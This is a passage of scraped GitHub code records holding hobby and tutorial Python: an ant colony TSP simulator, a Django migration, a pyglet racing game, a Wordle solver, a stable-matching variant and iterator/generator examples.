333\n\nprint(x)\nprint(y)\nprint(z*3)\n","repo_name":"abhmora1011/Robot_Python","sub_path":"PythonEssentials/4.TypeCast.py","file_name":"4.TypeCast.py","file_ext":"py","file_size_in_byte":296,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"35535073155","text":"import math \r\nimport random\r\nimport turtle \r\n\r\n### Turtle Functions ###\r\ns = turtle.getscreen()\r\nant = turtle.Turtle()\r\nant.shape(\"circle\")\r\nant.shapesize(0.9,0.9,0)\r\nantSpeed = \"normal\"\r\n\r\ntotalPopulation = 0 # Later set to number of ants times number of rounds\r\n\r\ndef drawCities(cityMatrix): # Draw each city as circles with index number\r\n style = (\"Courier\", 30)\r\n ant.pensize(4)\r\n for i in range(len(cityMatrix)):\r\n ant.up()\r\n\r\n ant.goto(cityMatrix[i][0],cityMatrix[i][1])\r\n ant.down()\r\n ant.circle(30)\r\n ant.write(i,font=style)\r\n \r\ndef initAnt(cityMatrix):\r\n ant.speed(antSpeed)\r\n ant.up()\r\n ant.goto(cityMatrix[0][0],cityMatrix[0][1])\r\n ant.down()\r\n\r\ndef changeLineStyle(frequency):\r\n ant.pensize(1+(2*frequency/totalPopulation)*10) #Make line width relative to route frequency\r\n if frequency < .7*totalPopulation*0.33: # Chance line color depending on route frequency\r\n ant.pencolor(\"red\")\r\n elif frequency < .7*totalPopulation*0.67:\r\n ant.pencolor(\"yellow\")\r\n else:\r\n ant.pencolor(\"green\")\r\n\r\n### Helper Functions ###\r\n\r\ndef displayMatrix(matrix):\r\n rows = len(matrix)\r\n cols = len(matrix[0])\r\n for x in range(rows):\r\n print(\"\\n\")\r\n print(x,\"| \", end=\" \")\r\n for y in range(cols):\r\n print(matrix[x][y], \",\", end=\" \")\r\n \r\ndef displayDistanceMatrix():\r\n print(\"\\n\\nDistance Matrix\")\r\n displayMatrix(distanceMatrix)\r\n \r\ndef displayPheromoneMatrix():\r\n print(\"\\n\\nPheromone Matrix\")\r\n displayMatrix(pheromoneMatrix)\r\n \r\ndef displayRouteFrequencyMatrix():\r\n print(\"\\n\\nRoute Frequency Matrix\")\r\n displayMatrix(routeFrequencyMatrix)\r\n\r\n\r\n### Input cities and their coordinates ###\r\n\r\nnumberOfCities = 0\r\ncitiesList = []\r\ncityCoordsMatrix = []\r\n\r\ndef loadCities():\r\n print(\"Please input city data (name x-coord y-coord) in this format: city x y\\n\")\r\n print(\"Do not include punctuation. Input errors require program restart.\")\r\n for z in range(numberOfCities):\r\n city, x, y = input(str(z)+\". Enter (City x y): \").split()\r\n citiesList.append(city)\r\n cityCoordsMatrix.append([int(x),int(y)])\r\n \r\ndef displayCitiesInfo():\r\n print(\"[city x y]: \\n\")\r\n for i in range(numberOfCities):\r\n print(citiesList[i], cityCoordsMatrix[i][0], cityCoordsMatrix[i][1], \"\\n\")\r\n\r\n### Calculate distance from coordinates and create matrix\r\n\r\ndistanceMatrix = []\r\n\r\ndef calculateDistance(coord1, coord2):\r\n return round(math.sqrt((coord1[1]-coord2[1])**2+(coord1[0]-coord2[0])**2),2)\r\n \r\ndef fillDistanceMatrix():\r\n for i in range(numberOfCities):\r\n distanceMatrix.append([calculateDistance (cityCoordsMatrix[i], cityCoordsMatrix[0])])\r\n for j in range(1,numberOfCities):\r\n distanceMatrix[i].append( calculateDistance (cityCoordsMatrix[i], cityCoordsMatrix[j]) )\r\n\r\n### Initalize matrices and data for traveling routes ###\r\n\r\nrouteFrequencyMatrix = [] #Stores number of times each route is visited\r\npheromoneMatrix = [] # Stores pheromone levels per route\r\n\r\nalpha = 1 # Controls influence of pheromones on decision making\r\nbeta = 1 # Controls influence of distance. \r\n\r\n### Sub functions for running a single trip. ###\r\n\r\ntripsLog = [] # Records every trip\r\nisFirstRound = True # Omits influence of pheromones on very first round\r\n \r\ndef calculatePheromones(currNode, nextNode):\r\n return (pheromoneMatrix[currNode][nextNode] + pheromoneMatrix[nextNode][currNode])**alpha\r\n\r\ndef calculateVisibility(currNode, nextNode): # Visibility = measure of how close next node is from current\r\n return (1/distanceMatrix[currNode][nextNode])**beta # Higher visibility = geographically closer\r\n \r\ndef calculateFitness(route, routes, firstTrip):\r\n aggFactor = 0\r\n if firstTrip: # If firstTrip:\r\n selfFactor = route[\"visibility\"] # Only use visibility for fitness \r\n for i in range(len(routes)):\r\n aggFactor += routes[i][\"visibility\"]\r\n route[\"fitness\"] = selfFactor/aggFactor\r\n else: # Otherwise:\r\n selfFactor = route[\"pheromones\"]*route[\"visibility\"] # Route's pheromone**alpha * visibility**beta\r\n for i in range(len(routes)):\r\n aggFactor += routes[i][\"pheromones\"]*routes[i][\"visibility\"] # divided by aggregate of all routes' pher**alpha * vis**beta\r\n route[\"fitness\"] = selfFactor/aggFactor # equals fitness. \r\n \r\ndef chooseRoute(validRoutes): # Standard relative probability selection \r\n randomNumber = random.randint(1,100)/100\r\n routeFound = False\r\n previousLimit = 0\r\n for i in range(len(validRoutes)):\r\n if randomNumber <= previousLimit + validRoutes[i][\"fitness\"]:\r\n routeFound = True\r\n return validRoutes[i]\r\n else:\r\n previousLimit += validRoutes[i][\"fitness\"]\r\n if routeFound == False:\r\n return validRoutes[len(validRoutes)-1]\r\n \r\ndef removeRoute(nextNode, routesList): # Remove node from \"valid next nodes\" when selected \r\n for i in range(len(routesList)):\r\n if routesList[i][\"nextNode\"] == nextNode:\r\n del routesList[i]\r\n return None\r\n \r\ndef updateFrequencyMatrix(prevNode, nextNode):\r\n routeFrequencyMatrix[prevNode][nextNode] += 1\r\n \r\ndef loadInitialRoutes():\r\n routes = []\r\n for i in range(numberOfCities-1):\r\n routes.append({\"nextNode\": i+1})\r\n return routes\r\n\r\n### To run a single trip ###\r\n\r\ndef runTrip():\r\n \r\n thisTrip = [0]\r\n availableRoutes = loadInitialRoutes()\r\n currNode = 0\r\n nextNode = None\r\n # For each route possibility (there are n-1 possible routes per trip, where n=number of nodes)\r\n for i in range(numberOfCities-1): \r\n for j in range(len(availableRoutes)): # calculate influence factors\r\n availableRoutes[j][\"pheromones\"] = calculatePheromones(currNode, availableRoutes[j][\"nextNode\"]) \r\n availableRoutes[j][\"visibility\"] = calculateVisibility(currNode, availableRoutes[j][\"nextNode\"])\r\n for k in range(len(availableRoutes)): # calculate fitness \r\n calculateFitness(availableRoutes[k], availableRoutes, isFirstRound)\r\n nextRoute = chooseRoute(availableRoutes) # choose a route\r\n nextNode = nextRoute[\"nextNode\"]\r\n thisTrip.append(nextNode) # record the route\r\n updateFrequencyMatrix(currNode, nextNode) \r\n changeLineStyle(routeFrequencyMatrix[currNode][nextNode])\r\n removeRoute(nextNode, availableRoutes) # remove chosen route as valid destination\r\n if i == numberOfCities-2: # if one city, left go home\r\n ant.goto(cityCoordsMatrix[nextNode][0],cityCoordsMatrix[nextNode][1])\r\n currNode = nextNode\r\n nextNode = 0\r\n else: # otherwise prep for next route of trip\r\n ant.goto(cityCoordsMatrix[nextNode][0],cityCoordsMatrix[nextNode][1])\r\n currNode = nextNode\r\n nextNode = None\r\n updateFrequencyMatrix(currNode, nextNode)\r\n ant.goto(cityCoordsMatrix[nextNode][0],cityCoordsMatrix[nextNode][1])\r\n tripsLog.append(thisTrip)\r\n \r\n### To run a round ###\r\n\r\nQ = 5 # Quantity; determines potency of pheromones; or, how much deposited per unit length\r\npDecay = 0.5 # How much pheromone REMAINS after one unit of time (this case after each round)\r\n\r\nnumberOfAnts = 0 # How many ants will travel the routes this round (how many trips/round)\r\n\r\ndef updatePheromoneMatrix():\r\n for i in range(numberOfCities):\r\n for j in range(numberOfCities):\r\n # if first round don't include 'prior' pheromones in calculations\r\n if distanceMatrix[i][j] != 0 and isFirstRound:\r\n pheromoneMatrix[i][j] = routeFrequencyMatrix[i][j]*(Q/distanceMatrix[i][j]) \r\n # next round lvl = prev round level * decay rate * quantity traveled * Q / length of route \r\n if distanceMatrix[i][j] != 0 and isFirstRound == False:\r\n pheromoneMatrix[i][j] = pheromoneMatrix[i][j]*(pDecay)*routeFrequencyMatrix[i][j]*(Q/distanceMatrix[i][j]) \r\n \r\ndef runRound():\r\n initAnt(cityCoordsMatrix)\r\n for i in range(numberOfAnts):\r\n runTrip()\r\n updatePheromoneMatrix()\r\n \r\n### To run a sim ###\r\nprint(\"-----------------------------------------------------\")\r\nprint(\"| Welcome to the Ant Colony Optimization Simulator! |\")\r\nprint(\"-----------------------------------------------------\\n\")\r\n\r\n\r\nvalidResponseDemo = False\r\n\r\nwhile validResponseDemo == False:\r\n print(\"The creator of this program has a suggested list of cities that best demonstrate this simulation. Would you like to try it? y/n: \")\r\n demoResponse = input()\r\n if demoResponse == 'y':\r\n validResponseDemo = True\r\n numberOfCities = 10\r\n citiesList = [\"CA\",\"WA\", \"WY\", \"IL\", \"NY\", \"KY\", \"AR\", \"FL\", \"NM\", \"MX\"]\r\n cityCoordsMatrix = [[-300,0],[-225,250],[-150,150],[0,75],[300,250],[300,0],[0,-75],[300,-250],[-150,-150],[-225,-250]]\r\n print(\"Great. Here's some info about the cities. \\n\")\r\n displayCitiesInfo()\r\n \r\n elif demoResponse =='n' :\r\n validResponseDemo = True\r\n numberOfCities = int(input(\"\\nThat's fine too! How many cities would you like to input? : \"))\r\n loadCities()\r\n \r\n else:\r\n print(\"I'm sorry, that's not an input I was expecting. Can you try again?\")\r\n\r\npheromoneMatrix =[[0]*numberOfCities for i in range(numberOfCities)]\r\nrouteFrequencyMatrix = [[0]*numberOfCities for i in range(numberOfCities)] \r\ndrawCities(cityCoordsMatrix)\r\nfillDistanceMatrix()\r\n\r\nnumberOfRounds = int(input(\"\\nHow many rounds would you like to run? : \"))\r\nnumberOfAnts = int(input(\"\\nHow many ants will travel each round? : \"))\r\ntotalPopulation = numberOfAnts*numberOfRounds\r\n\r\nvalidResponseSpeed = False\r\nwhile validResponseSpeed == False:\r\n print(\"Finally, choose the ants' speed- \\n{'normal', 'fast', 'fastest', 'slow', 'slowest'}: \\n\")\r\n speedResponse = input()\r\n if speedResponse == \"normal\" or \"fast\" or \"fastest\" or \"slow\" or \"slowest\":\r\n validResponseSpeed = True\r\n antSpeed = speedResponse\r\n else:\r\n print(\"I'm sorry, that's not an input I was expecting. Can you try again?\")\r\n \r\n\r\n\r\nprint(\"\\nStarting...\\n\")\r\nfor i in range(numberOfRounds):\r\n print(\"\\n\\n---- Round\", i+1, \"----\")\r\n runRound()\r\n isFirstRound = False;\r\n displayRouteFrequencyMatrix()\r\n displayPheromoneMatrix()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n \r\n\r\n\r\n \r\n\r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n","repo_name":"sungmin-gan/AntColonyOptimization","sub_path":"ACOvsTSP.py","file_name":"ACOvsTSP.py","file_ext":"py","file_size_in_byte":10270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"69941110195","text":"from django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('jobs', '0003_auto_20150211_1738'),\n ]\n\n operations = [\n migrations.RemoveField(\n model_name='job',\n name='company',\n ),\n migrations.AlterField(\n model_name='job',\n name='company_name',\n field=models.CharField(null=True, max_length=100),\n preserve_default=True,\n ),\n ]\n","repo_name":"python/pythondotorg","sub_path":"jobs/migrations/0004_auto_20150216_1544.py","file_name":"0004_auto_20150216_1544.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","stars":1412,"dataset":"github-code","pt":"39"} +{"seq_id":"23189113623","text":"from turtle import circle\nimport pyglet as pyg\nimport math\nimport time\nimport movement\nimport crashDetection\nimport car\nimport trackCreate\nimport walls\nimport AiSight\n\nx = 185.0\ny = 432.0\nrotate = 0.0\nxSpeed = 0.0\nySpeed = 0.0\nfriction = 1.08\nvelocity = 0.0\nsteer = 0.0\nHideTrack = False\ndisplay = pyg.canvas.Display()\nscreen = display.get_default_screen()\nscreen_width = screen.width\nscreen_height = screen.height\n\nmodifyerScaleX = screen_width / 1920\nmodifyerScaleY = screen_height / 1080\nx = x * modifyerScaleX\ny = y * modifyerScaleY \n\n\n\nraceTrack = trackCreate.track(screen_width, screen_height, modifyerScaleX, modifyerScaleY)\ntrack = raceTrack.loadTrack()\n\ntrackWalls = walls.walls(screen_width, screen_height, modifyerScaleX, modifyerScaleY)\npitch, pixels = trackWalls.loacteWalls()\n\nwindow = pyg.window.Window(screen.width,screen.height, fullscreen = True)\ntrack.blit(0,0)\n\n\npreCar = car.carBuild(screen_width, screen_height, modifyerScaleX, modifyerScaleY)\ncar = preCar.sprite()\n\n\n\n\n\nkeysPressed = []\n@window.event\ndef on_key_press(symbol, modifiers):\n keysPressed.append(symbol)\n@window.event\ndef on_key_release(symbol, modifiers):\n if symbol in keysPressed:\n keysPressed.remove(symbol)\n\n# def pDraw(player):\n# playerDraw = player\n# playerDraw.rotation = math.degrees(rotate)\n# playerDraw.draw()\n@window.event\ndef draw(dt):\n global x\n global y\n global rotate\n global xSpeed\n global ySpeed\n global friction\n global velocity\n global steer\n global pitch\n global pixels\n global HideTrack\n angles = [0,15,30,45,60,75]\n window.clear()\n \n player = pyg.sprite.Sprite(car, x , y, subpixel= True)\n player.rotation = math.degrees(rotate)\n\n move = movement.movement(dt, x, y, rotate, keysPressed,modifyerScaleX, modifyerScaleY, friction, velocity, xSpeed, ySpeed, steer)\n x, y, rotate, velocity, xSpeed, ySpeed, steer, reset = move.keys()\n HideTrack = move.swap(HideTrack)\n if HideTrack == True:\n for i in angles:\n line = AiSight.sight(x,y,rotate,pixels,pitch,i)\n line.line()\n else:\n track.blit(0,0)\n player = pyg.sprite.Sprite(car, x , y, subpixel= True)\n player.rotation = math.degrees(rotate)\n player.draw()\n crash = crashDetection.crash(x, y, rotate, xSpeed, ySpeed, pitch, pixels, modifyerScaleX, modifyerScaleY, velocity, steer)\n x, y, rotate, velocity, xSpeed, ySpeed, steer, reset= crash.crashCheck()\n if reset == True or reset == True: \n player = pyg.sprite.Sprite(car, x , y, subpixel= True)\n player.rotation = math.degrees(rotate)\n player.draw()\n reset = False\n time.sleep(0.75)\n \n\n \n\npyg.clock.schedule_interval(draw, 1/60)\npyg.app.run()\n","repo_name":"GreenFrog-Hub/RacingCarGame","sub_path":"Code/RaceCarGame.py","file_name":"RaceCarGame.py","file_ext":"py","file_size_in_byte":2731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"36367030971","text":"from typing import List, Dict\ndef groupAnagrams(strs: List[str]):\n frequency: Dict = dict()\n result: List[List[str]] = []\n for s in strs:\n temp = \"\".join(sorted(s))\n if temp in frequency:\n result[frequency[temp]].append(s)\n else:\n result.append([s])\n frequency[temp] = len(result)-1\n print(result)\n\n\nstrs = [\"eat\",\"tea\",\"tan\",\"ate\",\"nat\",\"bat\"]\ngroupAnagrams(strs)","repo_name":"purohitshubham1998/interview-questions","sub_path":"leet_code/49_group_anagrams.py","file_name":"49_group_anagrams.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"33122309773","text":"import pygame as pg\nfrom assets_loader import Asset\n\n\nclass LevelTile(pg.sprite.Sprite):\n def __init__(self, image: Asset, pos: tuple, groups) -> None:\n super().__init__(groups)\n self.image = image.surface\n self.metadata = image.metadata\n self.rect = self.image.get_rect(topleft=pos)\n","repo_name":"MarcoTorres04/game-maker","sub_path":"game_maker/play/tile.py","file_name":"tile.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"20197373632","text":"#! /usr/bin/env python3\n\nimport argparse\nimport collections\nfrom enum import Enum\nfrom fractions import Fraction\nimport math\nimport pathlib\nimport time\nfrom typing import List, Tuple, Dict, Set, Optional\n\nparser = argparse.ArgumentParser(description='Wordle solver')\nparser.add_argument(\n '--dictionary',\n help='Dictionary to use',\n type=pathlib.Path,\n default='wordle_dictionary.txt',\n )\n\nparser.add_argument(\n '--hints',\n help=\"\"\"\n Hints received so far. Example: aahed:GRRYR,abuse:GRRRG,atoke:GRRRG\n\n G: green\n Y: yellow\n R: gray\n \"\"\",\n type=str,\n default='',\n)\n\nparser.add_argument(\n '--log_interval',\n help='Log progress every N seconds',\n type=float,\n default=1,\n)\n\nclass HintPiece(Enum):\n GREEN = 'GREEN'\n YELLOW = 'YELLOW'\n GRAY = 'GRAY'\n\n def __repr__(self):\n return self.value\n\n# I don't know how to manage namespaces cleanly.\nGREEN = HintPiece.GREEN\nYELLOW = HintPiece.YELLOW\nGRAY = HintPiece.GRAY\n\ndef brief_hint_piece(hint_piece: HintPiece) -> str:\n if hint_piece == GREEN:\n return 'G'\n elif hint_piece == YELLOW:\n return 'Y'\n elif hint_piece == GRAY:\n return 'R'\n else:\n raise ValueError('Unknown hint piece: {}'.format(hint_piece))\n\ndef brief_hint(hint: Tuple[HintPiece]) -> str:\n return ''.join(brief_hint_piece(h) for h in hint)\n\nALL_GREEN = (GREEN, GREEN, GREEN, GREEN, GREEN)\n\ndef hint(actual, guess):\n \"\"\"Returns the hint for the word guessed.\n\n >>> hint('abcd', 'abcd')\n (GREEN, GREEN, GREEN, GREEN)\n >>> hint('abcd', 'dcba')\n (YELLOW, YELLOW, YELLOW, YELLOW)\n >>> hint('abcde', 'edcba')\n (YELLOW, YELLOW, GREEN, YELLOW, YELLOW)\n >>> hint('xxxxx', 'bacon')\n (GRAY, GRAY, GRAY, GRAY, GRAY)\n >>> hint('xaaax', 'xxaaa')\n (GREEN, YELLOW, GREEN, GREEN, YELLOW)\n >>> hint('aabbc', 'bbxxa')\n (YELLOW, YELLOW, GRAY, GRAY, YELLOW)\n >>> hint('bbxxa', 'aabbc')\n (YELLOW, GRAY, YELLOW, YELLOW, GRAY)\n >>> hint('abaci','bacon')\n (YELLOW, YELLOW, YELLOW, GRAY, GRAY)\n >>> hint('bacon', 'abaci')\n (YELLOW, YELLOW, GRAY, YELLOW, GRAY)\n \"\"\"\n if len(actual) != len(guess):\n raise ValueError('Word lengths must match')\n\n floating_letter_counts = collections.Counter(actual)\n for ac, gc in zip(actual, guess):\n if ac == gc:\n floating_letter_counts[ac] -= 1\n\n out = []\n for ac, gc in zip(actual, guess):\n if ac == gc:\n out.append(GREEN)\n elif floating_letter_counts[gc] > 0:\n out.append(YELLOW)\n floating_letter_counts[gc] -= 1\n else:\n out.append(GRAY)\n\n return tuple(out)\n\nGuessWithExpectation = collections.namedtuple('GuessWithExpectation', ['guess', 'expected_after'])\nclass Run:\n def __init__(self, guessable_words, log_sink=None):\n self._guessable_words = guessable_words\n self._log_sink = log_sink\n self._knowledge_states_seen = {}\n self._knowledge_states_visited = 0\n\n def log(self, *args):\n if self._log_sink is None:\n return\n\n self._log_sink(\n len(self._knowledge_states_seen),\n self._knowledge_states_visited,\n len(self._knowledge_states_seen) / self._knowledge_states_visited,\n *args)\n\n def best_guess(self, possibilities: Tuple[str], guesses_made, stack=[]) -> GuessWithExpectation:\n self._knowledge_states_visited += 1\n memoization_key = (guesses_made, possibilities)\n if memoization_key not in self._knowledge_states_seen:\n values = []\n for i, guess in enumerate(self._guessable_words):\n values.append(\n GuessWithExpectation(guess,\n self.expected_guesses_after(\n possibilities,\n guess,\n guesses_made+1,\n stack=stack + [len(possibilities), i+1, guess])),\n )\n best = min(\n values,\n key=lambda g: g.expected_after,\n )\n self.log(stack, 'best guess:', best.guess, float(best.expected_after))\n self._knowledge_states_seen[memoization_key] = min(values, key=lambda g: g.expected_after)\n return self._knowledge_states_seen[memoization_key]\n\n def expected_guesses_after(self, possibilities: Tuple[str], guess, guesses_made, stack=[]) -> Fraction:\n if guesses_made > 6:\n return math.inf\n\n remaining_guesses_distribution = collections.Counter()\n hint_subpossibilities = possibilities_by_hint(possibilities, guess)\n for hint_, sub_possibilities in hint_subpossibilities.items():\n sub_possibilities = tuple(sub_possibilities)\n\n sub_stack = stack + [brief_hint(hint_)]\n self.log(sub_stack)\n assert len(sub_possibilities) > 0\n\n if hint_ == ALL_GREEN:\n assert len(sub_possibilities) == 1\n remaining_guesses_distribution[0] += 1\n else:\n # This implies that you will learn absolutely nothing by\n # making the guess. So, don't!\n if len(sub_possibilities) == len(possibilities):\n return math.inf\n\n g = self.best_guess(sub_possibilities, guesses_made+1, stack=sub_stack)\n remaining_guesses_distribution[g.expected_after + 1] += len(sub_possibilities)\n\n # Can't use inf as the numerator because it's not a valid Fraction.\n numerator = sum(k * v for k, v in remaining_guesses_distribution.items())\n if numerator == math.inf:\n return math.inf\n\n return Fraction(\n numerator,\n sum(remaining_guesses_distribution.values()),\n )\n\ndef possibilities_by_hint(possibilities, guess):\n possibilities_by_hint = collections.defaultdict(list)\n for actual in possibilities:\n possibilities_by_hint[hint(actual, guess)].append(actual)\n return possibilities_by_hint\n\ndef parse_hint_piece(hint_piece: str) -> HintPiece:\n if hint_piece == 'G':\n return GREEN\n elif hint_piece == 'Y':\n return YELLOW\n elif hint_piece == 'R':\n return GRAY\n else:\n raise ValueError('Unknown hint piece: {}'.format(hint_piece))\n\ndef parse_hint(hintstr: str):\n return tuple(map(parse_hint_piece, hintstr))\n\ndef parse_hints(all_hints: str):\n if all_hints == '':\n return\n for chunk in all_hints.split(','):\n word, hintstr = chunk.split(':')\n yield word, parse_hint(hintstr)\n\nclass IntervalLogger:\n def __init__(self, interval):\n self._last_logged = 0\n self._interval = interval\n\n def log(self, *args):\n if time.time() - self._last_logged > self._interval:\n print(*args)\n self._last_logged = time.time()\n\nif __name__ == '__main__':\n import doctest\n failures, _ = doctest.testmod()\n assert failures == 0\n\n args = parser.parse_args()\n WORDS = tuple(args.dictionary.read_text().splitlines())\n print(len(WORDS), 'words loaded from', args.dictionary)\n\n possibilities = WORDS\n hints = list(parse_hints(args.hints))\n for word, hint_ in hints:\n pbh = possibilities_by_hint(possibilities, word)\n if hint_ not in pbh:\n print('No possibilities after hint', hint_)\n exit(1)\n possibilities = pbh[hint_]\n print(word, hint_, len(possibilities), 'possibilities remain')\n if len(possibilities) < 10:\n print('Possibilities:', sorted(possibilities))\n\n logger = IntervalLogger(args.log_interval)\n run = Run(guessable_words=WORDS, log_sink=logger.log)\n best_guess = run.best_guess(tuple(possibilities), guesses_made=len(hints))\n print(f'Best guess: \"{best_guess.guess}\", which should get the right answer in {float(best_guess.expected_after+1):.2f} guesses on average')\n","repo_name":"orborde/wordle","sub_path":"wordle.py","file_name":"wordle.py","file_ext":"py","file_size_in_byte":7910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"11575695071","text":"import copy\nimport time\nimport json\nwith open('10_couples_male.json') as f:\n guyprefers = json.load(f)\nwith open('10_couples_female.json') as f2:\n galprefers = json.load(f2)\nguys = sorted(guyprefers.keys())\ngals = sorted(galprefers.keys())\nprint(guyprefers)\nprint(galprefers)\ndef sorting(messed_order,correct_order):\n return [x for x in correct_order if x in messed_order]\ndef duplicate_remover(seq):\n seen = set()\n seen_add = seen.add\n return [ x for x in seq if x not in seen and not seen_add(x)]\ndef check(engaged):\n inverseengaged = dict((v,k) for k,v in engaged.items())\n for she, he in engaged.items():\n shelikes = galprefers[she]\n shelikesbetter = shelikes[:shelikes.index(he)]\n helikes = guyprefers[he]\n helikesbetter = helikes[:helikes.index(she)]\n for guy in shelikesbetter:\n guysgirl = inverseengaged[guy]\n guylikes = guyprefers[guy]\n if guylikes.index(guysgirl) > guylikes.index(she):\n print(\"%s and %s like each other better than \"\n \"their present partners: %s and %s, respectively\"\n % (she, guy, he, guysgirl))\n return False\n for gal in helikesbetter:\n girlsguy = engaged[gal]\n gallikes = galprefers[gal]\n if gallikes.index(girlsguy) > gallikes.index(he):\n print(\"%s and %s like each other better than \"\n \"their present partners: %s and %s, respectively\"\n % (he, gal, she, girlsguy))\n return False\n return True\n \ndef matchmaker():\n count = 0\n guysfree = guys[:]\n engaged = {}\n guyprefers2 = copy.deepcopy(guyprefers)\n galprefers2 = copy.deepcopy(galprefers)\n while guysfree:\n probability_to_break_up = 0\n guy = guysfree.pop(0)\n guyslist = guyprefers2[guy]\n gal = guyslist.pop(0) \n fiance = engaged.get(gal)\n if not fiance:\n # She's free\n guysfree.append(guy)\n if len(guysfree) > 0:\n _guys_free = sorting(guysfree, galprefers2[gal])\n probability_to_break_up = (_guys_free.index(guy))/len(_guys_free) \n if probability_to_break_up <= 0.5:\n engaged[gal] = guy\n print(\" %s and %s\" % (guy, gal))\n guysfree.pop(guysfree.index(guy))\n else:\n guysfree.pop(guysfree.index(guy))\n guysfree.append(guy)\n else:\n # The guy proposes to an engaged girl\n galslist = galprefers2[gal]\n if galslist.index(fiance) > galslist.index(guy):\n # She prefers new guy\n engaged[gal] = guy\n print(\" %s dumped %s for %s\" % (gal, fiance, guy))\n if guyprefers2[fiance]:\n # Ex has more girls to try\n guysfree.append(fiance)\n count += 1\n else:\n # She is faithful to old fiance\n if guyslist:\n # Look again\n guysfree.append(guy)\n print()\n print('Number of break ups for new algorithm: ', count)\n '''with open(\"...Location.../Records_new.txt\", \"a\") as text_file:\n text_file.writelines(\"Number of break ups recorded for 100 couples: %s\\n\" %count)'''\n return engaged\nprint()\nprint('Engagements:')\nengaged = matchmaker()\n \nprint('\\nCouples:')\nprint(' ' + ',\\n '.join('%s is engaged to %s' % couple\n for couple in sorted(engaged.items())))\nprint()\nprint('Engagement stability check PASSED'\n if check(engaged) else 'Engagement stability check FAILED')\n","repo_name":"frostNirv/Improved-Gale-Shapley-Algorithm","sub_path":"Improved-GSA.py","file_name":"Improved-GSA.py","file_ext":"py","file_size_in_byte":3759,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"17399940505","text":"#\n# @author xiashuo\n# @date 2023/7/4 16:54\n#\n\niter_01 = iter(\"abc\")\nprint(next(iter_01))\nprint(next(iter_01))\nprint(next(iter_01))\n# next方法获取最后一个元素之后再调用next,会报错 StopIteration\n# StopIteration 异常用于标识迭代的完成,防止出现无限循环的情况\n# print(next(iter_01))\n# 你也可以给一个默认值来避免报错\nprint(next(iter_01, \"我靠\"))\n\niter_02 = iter(\"abcdef\")\n# while 循环 配合 迭代器的 next 方法\n# 注意处理 StopIteration 异常\n# 但是直接使用for循环不会报这个错\nwhile True:\n try:\n print(next(iter_02), end=\" | \")\n except StopIteration:\n print(\"迭代结束\")\n break\n\n# 迭代range对象\niter_03 = iter(range(0, 10))\nfor x in iter_03:\n print(x, end=\" | \")\n\nprint()\n\n# 迭代元组\ntuple_01 = (*range(0, 10),)\niter_04 = iter(tuple_01)\nfor x in iter_04:\n print(x, end=\" | \")\n\nprint()\n\n# 迭代列表\niter_05 = iter([0, 1, 2, 3, 4, 5, 6, 7, 8, 9])\nfor x in iter_05:\n print(x, end=\" | \")\n\nprint()\n\n\n# 创建一个实现了迭代器的类\n\nclass MyIterator:\n def __iter__(self):\n self.a = 1\n return self\n\n # def __next__(self):\n # \"\"\"注意,这种实现是可以无限得带下去的\"\"\"\n # x = self.a\n # self.a += 1\n # return x\n\n def __next__(self):\n if self.a <= 10:\n x = self.a\n self.a += 1\n return x\n else:\n # StopIteration 异常用于标识迭代的完成,防止出现无限循环的情况,在 __next__() 方法中我们可以设置在完成指定循环次数后触发 StopIteration 异常来结束迭代。\n raise StopIteration\n\n\nmyIterator = MyIterator()\nmyiterObj = iter(myIterator)\nfor x in myiterObj:\n print(x, end=\" | \")\n\nprint()\n\n\n# 包含yield关键字的函数,是一个生成器函数,一个生成器函数对象,概念上就是一个迭代器,跟迭代器的用法一样\n\ndef countdown(n):\n while n > 0:\n yield n\n n -= 1\n\n\n# 创建生成器对象\n# 一个生成器对象,也是一个迭代器对象\ngenerator = countdown(5)\n# 输出 \n# 如果不包含yield 关键字,类型为 function\nprint(type(generator))\n\n# 通过迭代生成器获取值\nprint(next(generator)) # 输出: 5\nprint(next(generator)) # 输出: 4\nprint(next(generator)) # 输出: 3\n\n# 使用 for 循环迭代生成器\nfor value in generator:\n print(value) # 输出: 2 1\n\n\n# 在一个 generator function 中,如果没有 return,则默认执行至函数完毕,如果在执行过程中 return,则直接抛出 StopIteration 终止迭代。\n# 带有return的生成器\ndef countdown_with_return(n):\n while n > 0:\n yield n\n n -= 1\n if n == 2:\n # 使用该return则排出错误\n # 抛出错误 StopIteration\n return\n\n\ngenerator_with_return = countdown_with_return(3)\n# 输出3\nprint(next(generator_with_return))\n# 报错,输出 StopIteration\n# print(next(generator_with_return))\n\n# 判断是不是生成器\n\nfrom inspect import isgeneratorfunction\n\n\ndef test_function():\n print(\"test\")\n\n\n# True\nprint(isgeneratorfunction(countdown))\n# False\nprint(isgeneratorfunction(test_function))\n# False\nprint(isgeneratorfunction(lambda: print()))\n\n\n# 简单实践,输出斐波那契数列\n# 生成器本质上是一个产生迭代器的函数,作用类似于前面的自定义迭代器类\ndef fibonacci(n):\n count, a, b = 1, 1, 2\n while count <= n:\n yield a\n a, b = b, a + b\n count += 1\n\n\nfibonacci_generator = fibonacci(5)\nfor i in iter(fibonacci_generator):\n print(i, end=\" | \")\n\nprint()\n\n\n# yield关键字的简单测试\n# 通过生成器,我们可以把一个方法分成两段运行,第一段是从方法开始到yield 语句,第二段是从yield的下一句到方法末尾,很有意思\ndef yield_test():\n print(\"yield before\")\n # yield 返回 None\n yield\n print(\"yield 